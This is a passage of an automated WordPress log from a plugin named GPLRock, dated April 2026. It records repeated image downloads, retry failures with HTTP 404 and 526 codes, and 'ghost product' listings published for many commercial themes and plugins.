/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7389e0bf.jpg [04-Apr-2026 22:03:00 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-resume-manager-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7389e0bf.jpg [04-Apr-2026 22:03:00 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-resume-manager-addon [04-Apr-2026 22:03:01 UTC] GPLRock: Image downloaded successfully for product wpforms-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4be82d5.jpg [04-Apr-2026 22:03:01 UTC] GPLRock: Using pre-downloaded image for product wpforms-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4be82d5.jpg [04-Apr-2026 22:03:01 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-mailchimp [04-Apr-2026 22:05:16 UTC] GPLRock: Image downloaded successfully for product medizco-medical-health-dental-care-clinic-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b246023.jpg [04-Apr-2026 22:05:16 UTC] GPLRock: Using pre-downloaded image for product medizco-medical-health-dental-care-clinic-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b246023.jpg [04-Apr-2026 22:05:16 UTC] GPLRock: Ghost product published with image - Product ID: medizco-medical-health-dental-care-clinic-wordpress-theme [04-Apr-2026 22:05:18 UTC] GPLRock: Image downloaded successfully for product link-whisper-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62593409.jpg [04-Apr-2026 22:05:18 UTC] GPLRock: Using pre-downloaded image for product link-whisper-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62593409.jpg [04-Apr-2026 22:05:18 UTC] GPLRock: Ghost product published with image - Product ID: link-whisper-pro [04-Apr-2026 22:05:19 UTC] GPLRock: Image downloaded successfully for product bookory-book-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fa99e5e.jpg [04-Apr-2026 22:05:19 UTC] GPLRock: Using pre-downloaded image for product bookory-book-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fa99e5e.jpg [04-Apr-2026 22:05:19 UTC] GPLRock: Ghost product published with image - Product ID: bookory-book-store-woocommerce-theme [04-Apr-2026 22:05:21 UTC] GPLRock: Image downloaded successfully for product wordpress-quiz-maker-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11d1a5df.jpg [04-Apr-2026 22:05:21 UTC] GPLRock: Using pre-downloaded image for product wordpress-quiz-maker-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11d1a5df.jpg [04-Apr-2026 22:05:21 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-quiz-maker-plugin [04-Apr-2026 22:05:24 UTC] GPLRock: Image download failed for product soledad-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:28 UTC] GPLRock: Image download failed for product soledad-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:32 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Soledad-Multi-Concept-Blog-Magazine-News-AMP-WordPress-Theme.jpg for product soledad-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:05:34 UTC] GPLRock: Image download failed for product soledad-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:38 UTC] GPLRock: Image download failed for product soledad-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Soledad-Multi-Concept-Blog-Magazine-News-AMP-WordPress-Theme.jpg for product soledad-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:05:42 UTC] GPLRock WARNING: Image download failed for product soledad-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Soledad-Multi-Concept-Blog-Magazine-News-AMP-WordPress-Theme.jpg [04-Apr-2026 22:05:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soledad-wordpress-theme [04-Apr-2026 22:05:44 UTC] GPLRock: Image downloaded successfully for product wpnotif-wordpress-sms-whatsapp-message-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c4f30f0.jpg [04-Apr-2026 22:05:44 UTC] GPLRock: Using pre-downloaded image for product wpnotif-wordpress-sms-whatsapp-message-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c4f30f0.jpg [04-Apr-2026 22:05:44 UTC] GPLRock: Ghost product published with image - Product ID: wpnotif-wordpress-sms-whatsapp-message-notifications [04-Apr-2026 22:05:47 UTC] GPLRock: Image download failed for product essentials-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:51 UTC] GPLRock: Image download failed for product essentials-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:05:55 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/01/Essentials-Multipurpose-WordPress-Theme_-1.jpg for product essentials-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:05:57 UTC] GPLRock: Image download failed for product essentials-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:01 UTC] GPLRock: Image download failed for product essentials-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:05 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/01/Essentials-Multipurpose-WordPress-Theme_-1.jpg for product essentials-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:06:05 UTC] GPLRock WARNING: Image download failed for product essentials-multipurpose-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/01/Essentials-Multipurpose-WordPress-Theme_-1.jpg [04-Apr-2026 22:06:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essentials-multipurpose-wordpress-theme [04-Apr-2026 22:06:08 UTC] GPLRock: Image download failed for product adforest-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:12 UTC] GPLRock: Image download failed for product adforest-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:16 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/04/AdForest-Classified-Ads-WordPress-Theme.jpg for product adforest-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:06:18 UTC] GPLRock: Image download failed for product adforest-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:22 UTC] GPLRock: Image download failed for product adforest-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:27 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/04/AdForest-Classified-Ads-WordPress-Theme.jpg for product adforest-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:06:27 UTC] GPLRock WARNING: Image download failed for product adforest-classified-ads-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/04/AdForest-Classified-Ads-WordPress-Theme.jpg [04-Apr-2026 22:06:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adforest-classified-ads-wordpress-theme [04-Apr-2026 22:06:28 UTC] GPLRock: Image downloaded successfully for product sweet-date-more-than-a-wordpress-dating-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c91eb842.jpg [04-Apr-2026 22:06:28 UTC] GPLRock: Using pre-downloaded image for product sweet-date-more-than-a-wordpress-dating-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c91eb842.jpg [04-Apr-2026 22:06:28 UTC] GPLRock: Ghost product published with image - Product ID: sweet-date-more-than-a-wordpress-dating-theme [04-Apr-2026 22:06:31 UTC] GPLRock: Image download failed for product oceanwp-ocean-extra (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:35 UTC] GPLRock: Image download failed for product oceanwp-ocean-extra (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:39 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/OceanWP-Ocean-Extra.jpg for product oceanwp-ocean-extra after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:06:41 UTC] GPLRock: Image download failed for product oceanwp-ocean-extra (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:45 UTC] GPLRock: Image download failed for product oceanwp-ocean-extra (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:06:49 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/OceanWP-Ocean-Extra.jpg for product oceanwp-ocean-extra after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:06:49 UTC] GPLRock WARNING: Image download failed for product oceanwp-ocean-extra. URL: https://www.gplrock.com/wp-content/uploads/2021/07/OceanWP-Ocean-Extra.jpg [04-Apr-2026 22:06:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oceanwp-ocean-extra [04-Apr-2026 22:07:03 UTC] GPLRock: Image downloaded successfully for product exertion-architecture-interior-design-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7136fb22.webp [04-Apr-2026 22:07:03 UTC] GPLRock: Using pre-downloaded image for product exertion-architecture-interior-design-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7136fb22.webp [04-Apr-2026 22:07:03 UTC] GPLRock: Ghost product published with image - Product ID: exertion-architecture-interior-design-wordpress-theme [04-Apr-2026 22:07:03 UTC] GPLRock: Image download failed for product zilom-online-education-learning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:06 UTC] GPLRock: Image download failed for product zilom-online-education-learning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zilom---online-education-learning-wordpress-theme-25864.webp for product zilom-online-education-learning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:08 UTC] GPLRock: Image download failed for product zilom-online-education-learning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:10 UTC] GPLRock: Image download failed for product zilom-online-education-learning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zilom---online-education-learning-wordpress-theme-25864.webp for product zilom-online-education-learning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:12 UTC] GPLRock WARNING: Image download failed for product zilom-online-education-learning-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zilom---online-education-learning-wordpress-theme-25864.webp [04-Apr-2026 22:07:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zilom-online-education-learning-wordpress-theme [04-Apr-2026 22:07:12 UTC] GPLRock: Image download failed for product mee-responsive-resume-personal-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:14 UTC] GPLRock: Image download failed for product mee-responsive-resume-personal-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mee---responsive-resume--personal-portfolio-33533.webp for product mee-responsive-resume-personal-portfolio after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:17 UTC] GPLRock: Image download failed for product mee-responsive-resume-personal-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:19 UTC] GPLRock: Image download failed for product mee-responsive-resume-personal-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mee---responsive-resume--personal-portfolio-33533.webp for product mee-responsive-resume-personal-portfolio after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:21 UTC] GPLRock WARNING: Image download failed for product mee-responsive-resume-personal-portfolio. URL: https://meldwp.com/wp-content/uploads/mee---responsive-resume--personal-portfolio-33533.webp [04-Apr-2026 22:07:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mee-responsive-resume-personal-portfolio [04-Apr-2026 22:07:21 UTC] GPLRock: Image download failed for product maxi-gutenberg-magazine-news-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:23 UTC] GPLRock: Image download failed for product maxi-gutenberg-magazine-news-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxi---gutenberg-magazine--news-theme-17790.webp for product maxi-gutenberg-magazine-news-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:26 UTC] GPLRock: Image download failed for product maxi-gutenberg-magazine-news-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:28 UTC] GPLRock: Image download failed for product maxi-gutenberg-magazine-news-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxi---gutenberg-magazine--news-theme-17790.webp for product maxi-gutenberg-magazine-news-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:30 UTC] GPLRock WARNING: Image download failed for product maxi-gutenberg-magazine-news-theme. URL: https://meldwp.com/wp-content/uploads/maxi---gutenberg-magazine--news-theme-17790.webp [04-Apr-2026 22:07:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maxi-gutenberg-magazine-news-theme [04-Apr-2026 22:07:30 UTC] GPLRock: Image download failed for product fluxi-seo-marketing-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:32 UTC] GPLRock: Image download failed for product fluxi-seo-marketing-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxi---seo-marketing-digital-agency-wordpress-theme-3670.webp for product fluxi-seo-marketing-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:34 UTC] GPLRock: Image download failed for product fluxi-seo-marketing-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:36 UTC] GPLRock: Image download failed for product fluxi-seo-marketing-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxi---seo-marketing-digital-agency-wordpress-theme-3670.webp for product fluxi-seo-marketing-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:38 UTC] GPLRock WARNING: Image download failed for product fluxi-seo-marketing-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fluxi---seo-marketing-digital-agency-wordpress-theme-3670.webp [04-Apr-2026 22:07:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fluxi-seo-marketing-digital-agency-wordpress-theme [04-Apr-2026 22:07:39 UTC] GPLRock: Image downloaded successfully for product olbia-elegant-wordpress-theme-for-photographers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07340169.webp [04-Apr-2026 22:07:39 UTC] GPLRock: Using pre-downloaded image for product olbia-elegant-wordpress-theme-for-photographers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07340169.webp [04-Apr-2026 22:07:39 UTC] GPLRock: Ghost product published with image - Product ID: olbia-elegant-wordpress-theme-for-photographers [04-Apr-2026 22:07:39 UTC] GPLRock: Image download failed for product sushico-sushi-and-asian-food-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:41 UTC] GPLRock: Image download failed for product sushico-sushi-and-asian-food-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sushico---sushi-and-asian-food-restaurant-wordpress-theme-13870.webp for product sushico-sushi-and-asian-food-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:43 UTC] GPLRock: Image download failed for product sushico-sushi-and-asian-food-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:45 UTC] GPLRock: Image download failed for product sushico-sushi-and-asian-food-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sushico---sushi-and-asian-food-restaurant-wordpress-theme-13870.webp for product sushico-sushi-and-asian-food-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:47 UTC] GPLRock WARNING: Image download failed for product sushico-sushi-and-asian-food-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sushico---sushi-and-asian-food-restaurant-wordpress-theme-13870.webp [04-Apr-2026 22:07:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sushico-sushi-and-asian-food-restaurant-wordpress-theme [04-Apr-2026 22:07:47 UTC] GPLRock: Image download failed for product gamger-gaming-gear-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:49 UTC] GPLRock: Image download failed for product gamger-gaming-gear-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gamger--gaming-gear-woocommerce-theme-14130.webp for product gamger-gaming-gear-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:52 UTC] GPLRock: Image download failed for product gamger-gaming-gear-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:54 UTC] GPLRock: Image download failed for product gamger-gaming-gear-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gamger--gaming-gear-woocommerce-theme-14130.webp for product gamger-gaming-gear-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:07:56 UTC] GPLRock WARNING: Image download failed for product gamger-gaming-gear-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/gamger--gaming-gear-woocommerce-theme-14130.webp [04-Apr-2026 22:07:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gamger-gaming-gear-woocommerce-theme [04-Apr-2026 22:07:56 UTC] GPLRock: Image download failed for product oktan-oil-gas-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:07:58 UTC] GPLRock: Image download failed for product oktan-oil-gas-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oktan--oil--gas-industry-wordpress-theme-4938.webp for product oktan-oil-gas-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:08:00 UTC] GPLRock: Image download failed for product oktan-oil-gas-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:02 UTC] GPLRock: Image download failed for product oktan-oil-gas-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oktan--oil--gas-industry-wordpress-theme-4938.webp for product oktan-oil-gas-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:08:04 UTC] GPLRock WARNING: Image download failed for product oktan-oil-gas-industry-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oktan--oil--gas-industry-wordpress-theme-4938.webp [04-Apr-2026 22:08:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oktan-oil-gas-industry-wordpress-theme [04-Apr-2026 22:08:05 UTC] GPLRock: Image download failed for product ecomus-ultimate-shopify-os-30-theme-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:07 UTC] GPLRock: Image download failed for product ecomus-ultimate-shopify-os-30-theme-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecomus---ultimate-shopify-os-30-theme-block-31189.webp for product ecomus-ultimate-shopify-os-30-theme-block after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:08:09 UTC] GPLRock: Image download failed for product ecomus-ultimate-shopify-os-30-theme-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:11 UTC] GPLRock: Image download failed for product ecomus-ultimate-shopify-os-30-theme-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:08:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecomus---ultimate-shopify-os-30-theme-block-31189.webp for product ecomus-ultimate-shopify-os-30-theme-block after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:08:13 UTC] GPLRock WARNING: Image download failed for product ecomus-ultimate-shopify-os-30-theme-block. URL: https://meldwp.com/wp-content/uploads/ecomus---ultimate-shopify-os-30-theme-block-31189.webp [04-Apr-2026 22:08:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecomus-ultimate-shopify-os-30-theme-block [04-Apr-2026 22:09:14 UTC] GPLRock: Image downloaded successfully for product give-currency-switcher (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa094cc1.jpg [04-Apr-2026 22:09:14 UTC] GPLRock: Using pre-downloaded image for product give-currency-switcher: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa094cc1.jpg [04-Apr-2026 22:09:14 UTC] GPLRock: Ghost product published with image - Product ID: give-currency-switcher [04-Apr-2026 22:09:15 UTC] GPLRock: Image downloaded successfully for product give-2checkout-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62a9074a.jpg [04-Apr-2026 22:09:15 UTC] GPLRock: Using pre-downloaded image for product give-2checkout-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62a9074a.jpg [04-Apr-2026 22:09:15 UTC] GPLRock: Ghost product published with image - Product ID: give-2checkout-gateway [04-Apr-2026 22:09:17 UTC] GPLRock: Image downloaded successfully for product yith-desktop-notifications-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c4ad4fb8.jpg [04-Apr-2026 22:09:17 UTC] GPLRock: Using pre-downloaded image for product yith-desktop-notifications-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c4ad4fb8.jpg [04-Apr-2026 22:09:17 UTC] GPLRock: Ghost product published with image - Product ID: yith-desktop-notifications-for-woocommerce-premium [04-Apr-2026 22:09:18 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-best-sellers-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb4effb4.jpg [04-Apr-2026 22:09:18 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-best-sellers-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb4effb4.jpg [04-Apr-2026 22:09:18 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-best-sellers-premium [04-Apr-2026 22:09:19 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-eu-vat-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d573fca6.jpg [04-Apr-2026 22:09:19 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-eu-vat-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d573fca6.jpg [04-Apr-2026 22:09:19 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-eu-vat-premium [04-Apr-2026 22:09:20 UTC] GPLRock: Image downloaded successfully for product yith-geoip-language-redirect-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99c262dc.jpg [04-Apr-2026 22:09:20 UTC] GPLRock: Using pre-downloaded image for product yith-geoip-language-redirect-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99c262dc.jpg [04-Apr-2026 22:09:20 UTC] GPLRock: Ghost product published with image - Product ID: yith-geoip-language-redirect-for-woocommerce-premium [04-Apr-2026 22:09:22 UTC] GPLRock: Image downloaded successfully for product woocommerce-newsletter-subscription (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bd33be8.jpg [04-Apr-2026 22:09:22 UTC] GPLRock: Using pre-downloaded image for product woocommerce-newsletter-subscription: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bd33be8.jpg [04-Apr-2026 22:09:22 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-newsletter-subscription [04-Apr-2026 22:09:23 UTC] GPLRock: Image downloaded successfully for product oceanwp-popup-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8836360.jpg [04-Apr-2026 22:09:23 UTC] GPLRock: Using pre-downloaded image for product oceanwp-popup-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8836360.jpg [04-Apr-2026 22:09:23 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-popup-login [04-Apr-2026 22:09:24 UTC] GPLRock: Image downloaded successfully for product oceanwp-footer-callout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e43c29c.jpg [04-Apr-2026 22:09:24 UTC] GPLRock: Using pre-downloaded image for product oceanwp-footer-callout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3e43c29c.jpg [04-Apr-2026 22:09:24 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-footer-callout [04-Apr-2026 22:09:26 UTC] GPLRock: Image downloaded successfully for product oceanwp-white-label (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-558f9565.jpg [04-Apr-2026 22:09:26 UTC] GPLRock: Using pre-downloaded image for product oceanwp-white-label: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-558f9565.jpg [04-Apr-2026 22:09:26 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-white-label [04-Apr-2026 22:12:10 UTC] GPLRock: Image download failed for product maker-tools-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:12 UTC] GPLRock: Image download failed for product maker-tools-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maker--tools-store-wordpress-theme-13251.webp for product maker-tools-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:15 UTC] GPLRock: Image download failed for product maker-tools-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:17 UTC] GPLRock: Image download failed for product maker-tools-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maker--tools-store-wordpress-theme-13251.webp for product maker-tools-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:19 UTC] GPLRock WARNING: Image download failed for product 